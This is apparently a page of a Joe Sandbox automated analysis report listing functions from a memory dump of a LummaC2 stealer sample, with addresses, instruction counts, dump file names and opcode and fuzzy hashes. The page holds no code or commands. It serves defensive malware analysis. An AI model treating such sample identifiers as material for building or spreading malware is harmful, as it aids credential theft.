Function 006EDEB0 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d5ba261d379f8eceaef985750eeb6c0b81b7eced13851e862aaac52c688a79f0
Instruction ID: 4846c0681ebd4f1d2d158f8e4171d226818df528bdc0c5c97211d6252bd2b872
Opcode Fuzzy Hash: d5ba261d379f8eceaef985750eeb6c0b81b7eced13851e862aaac52c688a79f0
Instruction Fuzzy Hash: AC91F1356063419FD728DF19D890AAAB3E3EFD8710F15846CE8858B365DB31EC51CB82

Function 006B61D0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5140ca86dd5b4bcaba2cb1346e0d6ff8cb35f9844ba483e5f1b1bd21b4eb7be
Instruction ID: d9c673cefdf3a7592a40097acae98ad05a23f3549d3f973e7eb9d67dc2e9f2a7
Opcode Fuzzy Hash: b5140ca86dd5b4bcaba2cb1346e0d6ff8cb35f9844ba483e5f1b1bd21b4eb7be
Instruction Fuzzy Hash: B3C15CB29487418FC370CF68DC967ABB7E1BF85318F08492DD1D9C6242E778A195CB46

Function 006D8C46 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f663a7f0716c3dbbcd8f9bb5c5526ad8eb7ee686e867f8c764a86d6d0dee72a
Instruction ID: 7471b6b4ce47806dcc0dbfc4ba730c3671cb21eec930e3f75ff6839c87404d39
Opcode Fuzzy Hash: 9f663a7f0716c3dbbcd8f9bb5c5526ad8eb7ee686e867f8c764a86d6d0dee72a
Instruction Fuzzy Hash: 14A122B09083409FC724DF68C8966ABB7F2EF95304F04496DF6958B392E779D805CB86

Function 006EDBB0 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2e7c97b839518853998a0ab073b453ee069236d50316142a974570ab6ae72540
Instruction ID: 5883af480a1d2a1b73daa2fa5deb96f39b61e942a36d52b8c3896c387ba2b8d8
Opcode Fuzzy Hash: 2e7c97b839518853998a0ab073b453ee069236d50316142a974570ab6ae72540
Instruction Fuzzy Hash: 2E814676A063549BCB249F29C8806BBB3A3EFD4754F19C16CE8859B394EB30AD11C7C1

Function 006CD560 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25220144c21c715f138a8310774a307e74259239121bebce9dec003cebb1ff1b
Instruction ID: 15e597925e4a23e92743b4892edfe878dcb988880997a7c253afeff9d41113f3
Opcode Fuzzy Hash: 25220144c21c715f138a8310774a307e74259239121bebce9dec003cebb1ff1b
Instruction Fuzzy Hash: AC914A72A042615FCB168E28C8517AE7BE2EBD5324F19863DE8B9873C1D7349C06D7D0

Function 006D7D94 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 888295f9c93fc9a9a89abc09e13f51d3cd32e4174172e3f7a5ad3307f572a9e3
Instruction ID: f84aec9aa6c4ba77c9632006aea363d32a77042c2b7977905b0428c103a8d205
Opcode Fuzzy Hash: 888295f9c93fc9a9a89abc09e13f51d3cd32e4174172e3f7a5ad3307f572a9e3
Instruction Fuzzy Hash: D59143B6D00606CFDB148F98DC95BAEBBB2FF48314F19416DE6026B351C775A816CB80

Function 006E74F0 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60bbb1e395048fb12a97635458e8915744f0f67462bd574d9f7e3f114b783c0c
Instruction ID: acb46ae1c8b9a98cbaa40233737b90054244736425453e114e0f03597c935f96
Opcode Fuzzy Hash: 60bbb1e395048fb12a97635458e8915744f0f67462bd574d9f7e3f114b783c0c
Instruction Fuzzy Hash: 4761327221A3019FD714DF69DC85B6B77E3EB80304F19882CE585C7290EA76EA09C792

Function 006EA0D0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dca7466f318ef820067fd9cce7cb7f000818756feaf68249c81456a935e8038a
Instruction ID: ab19d5c711ed6fad68271bdf3e6bfc26a32dd454313dc1bf6d0dc3e1f2eb3358
Opcode Fuzzy Hash: dca7466f318ef820067fd9cce7cb7f000818756feaf68249c81456a935e8038a
Instruction Fuzzy Hash: D7518B756093448FEB249FA6D8517BB77D3EB85704F19887CD582A7342E632BD01CB82

Function 006EA510 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4beb6ceaef0aba981fe1e66c6f3e689af990627cf1cd3b02bc544ad1015fb0f2
Instruction ID: b248d2482fc0b159702e6231f6579d529f00dc2d119b0545cb02cfc3406a1694
Opcode Fuzzy Hash: 4beb6ceaef0aba981fe1e66c6f3e689af990627cf1cd3b02bc544ad1015fb0f2
Instruction Fuzzy Hash: 6C514B35A063504FDB20DF6AD8806A7B793EBD6714F29856CC4819B351D775BC06C7C2

Function 006CDFC0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70179d364ed0ff5bfe564d59632724cc84eb0a14bc76796ef73ce2de24ee5b97
Instruction ID: a55103f5df0dd038c21dd925a9634a34f0cfbabd622736b9fb4f1e39b0d8f99f
Opcode Fuzzy Hash: 70179d364ed0ff5bfe564d59632724cc84eb0a14bc76796ef73ce2de24ee5b97
Instruction Fuzzy Hash: CC610A33789A804BD728997C5C5237979A38BD7334B2D977D96B1CB3E1D9A64C024340

Function 006D30E0 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dfb8a616a2dc3fc87bcc5c186b4373e230d31e6b8a4756d8a5aa666d6f00c3b
Instruction ID: 373b4a41ecf528a07c3059959f0217dea64cff520e218c2d5fe0683725d0e18e
Opcode Fuzzy Hash: 5dfb8a616a2dc3fc87bcc5c186b4373e230d31e6b8a4756d8a5aa666d6f00c3b
Instruction Fuzzy Hash: 7A519F35A19212CBE718CF28DC6136A73A3FB88311F1A867DE846D7794DB75D851CB80

Function 006E5FF0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9660528848eb795099f5dbc418725243399d0dc5ee54d9a413ace79cd833391
Instruction ID: 769161c8fe56483817462c70f3d91f792b88f047adbc54eecd7421c9a448c59e
Opcode Fuzzy Hash: c9660528848eb795099f5dbc418725243399d0dc5ee54d9a413ace79cd833391
Instruction Fuzzy Hash: EF515CB15097548FE714DF29D89435BBBE1BBC4358F044E2DE4E987391E379DA088B82

Function 006C92C0 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecdfa40d0b845583c2ac38a1d673cc44670808f1b637eedd7da704723216b426
Instruction ID: e85d17590a1c97dc3ce6d8315d42a19143c5aba2511047d58cb43d7b29d21696
Opcode Fuzzy Hash: ecdfa40d0b845583c2ac38a1d673cc44670808f1b637eedd7da704723216b426
Instruction Fuzzy Hash: DE5111B2904250DBC7209F24DC96BBB73E6EF86364F08452DE899873A1E734D941C766

Function 006BEDB4 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 32fe4fce381bb48e570721e2c0a64cf4e502f7122bb3e2e94d5c62c673f40e04
Instruction ID: 77d836332e8842dfb922616de67eecb3e5a00a8845e872c50da4e7c8b8768b7f
Opcode Fuzzy Hash: 32fe4fce381bb48e570721e2c0a64cf4e502f7122bb3e2e94d5c62c673f40e04
Instruction Fuzzy Hash: 9F51F4B5A183808FD724CB28D8807FEB7A3ABD5354F24D92DD48797355DB729882C781

Function 006DB078 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8828b6e1734cc840451667465f9194f1bdc2e0c9deac25e39857fdf18088d134
Instruction ID: a8a98e5ef9444cded40f8320edd2cfc97357b43a4458a35af271887a56235ad7
Opcode Fuzzy Hash: 8828b6e1734cc840451667465f9194f1bdc2e0c9deac25e39857fdf18088d134
Instruction Fuzzy Hash: 1241F36490C3C19BE7358F299CB07B7BBD1AFA3304F28686DE4DA8B342D6304505C756

Function 006E7D00 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa1a1e9dc91b447d8c0c072a692bf98d232781fe2e6e1b6e273ff35fe19ce798
Instruction ID: cc4a17561a2e8c01383641b10d61f80dd5cbd8c4210314c8a11cf8ec90ade817
Opcode Fuzzy Hash: aa1a1e9dc91b447d8c0c072a692bf98d232781fe2e6e1b6e273ff35fe19ce798
Instruction Fuzzy Hash: 744139B2A0A3045FE710AE56EC81BBBB7A7EF81704F14082CF98597241E736ED0587D6

Function 006E7EA0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49588468f4a352f4693d4c90c6e1848724b645c41352eb3d467dfdc9ac2005af
Instruction ID: 3a4ad3b98c247b50e1d5227ee10c160744f05b2f9308ffd4d72999f4e4ea33c0
Opcode Fuzzy Hash: 49588468f4a352f4693d4c90c6e1848724b645c41352eb3d467dfdc9ac2005af
Instruction Fuzzy Hash: 5C41F573A1A6504FD3448E798C4026BBA936BD5330F2AC73DE9B5873D5DA7988068281

Function 006EF040 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ab788418c885bc77af8d469ffdbe0dc045cc5253fde4b97bf04d125795822cf6
Instruction ID: 7536dc86d8e2ca2aa49ca77551f219eb9bb9b2471df5125630fe74cb3dc11dfc
Opcode Fuzzy Hash: ab788418c885bc77af8d469ffdbe0dc045cc5253fde4b97bf04d125795822cf6
Instruction Fuzzy Hash: 5B410571706388EFE7248B1ADCD1BB6B3A7EB89718F24852CE4C597291DA31BD11C681

Function 006EB46A Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd1a0b5f14915dcd9dceba6db2c14fb890af050dd313ddac78c8bc612fe18c77
Instruction ID: d74f5d8121d41488a6925cda10c1eda57890616fbe43275fd8e1da1d30e41fa6
Opcode Fuzzy Hash: fd1a0b5f14915dcd9dceba6db2c14fb890af050dd313ddac78c8bc612fe18c77
Instruction Fuzzy Hash: 8A4125B1A11642DBCB08CF39DC612BDBBE3FB95310B08822DD402E7395EB386555CB88

Function 006C6D52 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72acf6d095f63c1a9704f9924bb1102acb9b1b2fc47e8d943e2308d163cb7a5b
Instruction ID: 7ee3d0174608dc20902e43c603be87d2a194c5616a96173ac2737ab5c08daad1
Opcode Fuzzy Hash: 72acf6d095f63c1a9704f9924bb1102acb9b1b2fc47e8d943e2308d163cb7a5b
Instruction Fuzzy Hash: 5911D3B5B0C2018BD728CF25D88167777A3FBD9319F28956CD0CA93321DA359C56CB4A

Function 006B8A20 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 293d11ecb15a4287942a121f2196c36d4946016947497cfec40f8ac486ff9ff3
Instruction ID: 2a57ba72ccdfe7f82496dc61887af5ca091ea2ea3b51d533b0ad2a7be95b87c1
Opcode Fuzzy Hash: 293d11ecb15a4287942a121f2196c36d4946016947497cfec40f8ac486ff9ff3
Instruction Fuzzy Hash: 0021DB77E519244BE310CD56CC803927796A7C9338F3E86B8C9689B392D53BAD0386C0

Function 006EBCDB Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b4b357b747f3352ddb438d444e224fa981131fa73965159f2f734ae30f13727
Instruction ID: 166f319cffb4991219888ab3c1c95ffe8ac1d5d272f2ab7336a49ccf1ef2d50a
Opcode Fuzzy Hash: 7b4b357b747f3352ddb438d444e224fa981131fa73965159f2f734ae30f13727
Instruction Fuzzy Hash: 9F110672E156118BCB18CF69C8512BAB7B3ABD5200B19D155C855A7348D738A812CBD4

Function 006C9605 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b6e3cb5ff36c47afc54525b1b125e58f3650d2c56974b4a348de80dd10273c0
